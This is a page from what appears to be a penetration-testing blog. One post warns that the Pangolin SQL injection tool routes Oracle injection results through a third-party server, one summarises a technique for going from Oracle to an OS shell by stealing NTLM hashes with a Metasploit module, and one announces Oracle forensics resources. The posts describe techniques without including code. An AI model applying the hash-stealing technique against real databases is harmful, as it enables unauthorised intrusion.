Showing posts with label Oracle. Show all posts
Showing posts with label Oracle. Show all posts

Friday, May 8, 2009

Pangolin and your data

This will be a brief entry about a dubious behavior of Pangolin (SQL Injection Tool). Today we were checking some of the features of Pangolin, and i had special interest on the ORACLE UTL_HTPP injection, i checked the options and there wasn't a configuration for the local HTTP server, so i was wondering how the hell they got the results back.

So i started Pangolin against a test server, and there wasn't any open port in my machine, next step my coworker Javi, launched the attack and sniffed the traffic, all the injection was urlencoded+Oracle (char) encoding, after decoding we found that the results of the injection is sent to a nosec.org web server, and then Pangolin perform a GET to retrieve the data. WTH?

At least let the user know what are you doing with the data, i don't think this will make penetration testers happy, knowing that they customers data is traveling via a third party server.

Be careful where you send your data ;)

-CMM
By - No comments:
Labels: , ,

Saturday, April 11, 2009

From Oracle to the OS with Metasploit

I'm back from my vacations, and it's time write some new posts

I read an interesting article on how to obtain a shell through Oracle Database, this article was written by Alexandr Polyakov from www.dsecrg.com, they have more interesting things about Oracle penetration testing on their website.

The article explains how to obtain an OS shell, via Pass the hash technique inside Oracle, using only an account with the CONNECT and RESOURCE privileges. The idea is to read a file over the network via SMB (ctxsys.context) and connect to a fake SMB server to steal the NTLM challenge-response.

The author explains the creation of a Metasploit plugin (ora_ntlm_stealer) to automate the process, so you can get it by updating your svn copy.

Here is the paper with the complete information

Enjoy

-CMM
By - No comments:
Labels: ,

Tuesday, December 9, 2008

Oracle Forensics


Hi, this time i will post a brief entry about Oracle Forensics, when we talk about Oracle Forensics we are talking about David Litchfield, he researched and developed tools for analyzing Oracle from the forensic point of view.

Next Thursday he will participate in a Black Hat Webinar, where he specifically will talk about  Orablock:

"The tool, orablock, allows a forensic investigator to dump data from a "cold" Oracle data file - i.e. there's no need to load up the data file in the database which would cause the data file to be modified, so using orablock preserves the evidence. "

You can register here.

Also he will publish a book about Oracle Forensics very soon, you can pre order it at amazon, the book is called "Oracle Forensics Using Quisix"

And if you want to check all his presentations and papers about the issue you can  go here.

There are few persons working in this field, and besides Litchfield we can refer to Paul M. Wright, author of the first Oracle Forensic Book, you can check his blog here.

Enjoy!
-CMM
By - No comments:
Labels: ,
Subscribe to: Posts (Atom)

Wfuzz 2.2.0 released

I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...

  • Wfuzz 2.1 released !
    I'm pleased to announce  a new version of WFuzz! Wfuzz is a tool designed for bruteforcing Web Applications, it can be used for findi...
  • Scan for shellshock with wfuzz
    In the last few weeks everyone has been talking about Shellshock, the vulnerability affecting bash and having security ramifications everyw...
  • Wfuzz 2.2.0 released
    I'm pleased to announce a new version of WFuzz! Wfuzz has been created to facilitate the task in web applications assessments and it...